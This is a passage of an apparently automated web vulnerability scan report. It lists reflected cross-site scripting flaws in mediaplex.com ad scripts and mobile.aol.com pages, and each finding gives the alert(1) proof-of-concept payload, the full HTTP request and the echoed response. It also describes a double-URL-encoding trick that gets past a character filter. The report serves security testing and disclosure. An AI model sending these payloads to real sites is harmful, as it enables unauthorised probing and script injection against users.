The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e8cf'%3balert(1)//be387eac33d was submitted in the mpck parameter. This input was echoed as 5e8cf';alert(1)//be387eac33d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D5968503025e8cf'%3balert(1)//be387eac33d&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:34 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6038
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=5968503025e8cf';alert(1)//be387eac33d" target="_blank">
...[SNIP]...

5.100. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99895"%3balert(1)//eec92958401 was submitted in the mpvc parameter. This input was echoed as 99895";alert(1)//eec92958401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=99895"%3balert(1)//eec92958401 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:36 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6034
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=99895";alert(1)//eec92958401");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b
...[SNIP]...

5.101. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813cd'%3balert(1)//22109c76d43 was submitted in the mpvc parameter. This input was echoed as 813cd';alert(1)//22109c76d43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=813cd'%3balert(1)//22109c76d43 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:38 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6034
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=813cd';alert(1)//22109c76d43http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=596850302" target="_blank">
...[SNIP]...

5.102. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac50'%3balert(1)//03fc7ce85ac was submitted in the mpck parameter. This input was echoed as 8ac50';alert(1)//03fc7ce85ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D5569843488ac50'%3balert(1)//03fc7ce85ac&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:08 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5731
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2?mpt=5569843488ac50';alert(1)//03fc7ce85ac" target="_blank">
...[SNIP]...

5.103. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d27"-alert(1)-"0f6b11cd576 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:06 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5725
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348d2d27"-alert(1)-"0f6b11cd576");
mpck = "
...[SNIP]...

5.104. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c482d'%3balert(1)//486db0490f6 was submitted in the mpvc parameter. This input was echoed as c482d';alert(1)//486db0490f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=c482d'%3balert(1)//486db0490f6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:12 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5727
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=c482d';alert(1)//486db0490f6http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2?mpt=556984348" target="_blank">
...[SNIP]...

5.105. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64fa4"%3balert(1)//33dbfc603f5 was submitted in the mpvc parameter. This input was echoed as 64fa4";alert(1)//33dbfc603f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=64fa4"%3balert(1)//33dbfc603f5 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:10 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:55 GMT
ETag: "4068ab-104f-4a277c3b3efc0"
Accept-Ranges: bytes
Content-Length: 5727
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=64fa4";alert(1)//33dbfc603f5");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlk
...[SNIP]...

5.106. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5df73%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e303fb8370dc was submitted in the REST URL parameter 2. This input was echoed as 5df73</script><script>alert(1)</script>303fb8370dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Android5df73%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e303fb8370dc/dailyfinance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:45:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:45:37 GMT; path=/
Content-Type: text/html
Content-Length: 23720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
ID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="Android5df73</script><script>alert(1)</script>303fb8370dc";
   s_265.prop2="dailyfinance";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('scr
...[SNIP]...

5.107. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd897%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bc98c24ff1 was submitted in the REST URL parameter 2. This input was echoed as cd897</script><script>alert(1)</script>5bc98c24ff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Androidcd897%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bc98c24ff1/dailyfinance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:45:52 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:45:52 GMT; path=/
Content-Type: text/html
Content-Length: 23718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'Androidcd897</script><script>alert(1)</script>5bc98c24ff1';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.108. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbd7c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ee1b9a6005 was submitted in the REST URL parameter 3. This input was echoed as fbd7c</script><script>alert(1)</script>2ee1b9a6005 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Android/dailyfinancefbd7c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ee1b9a6005/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
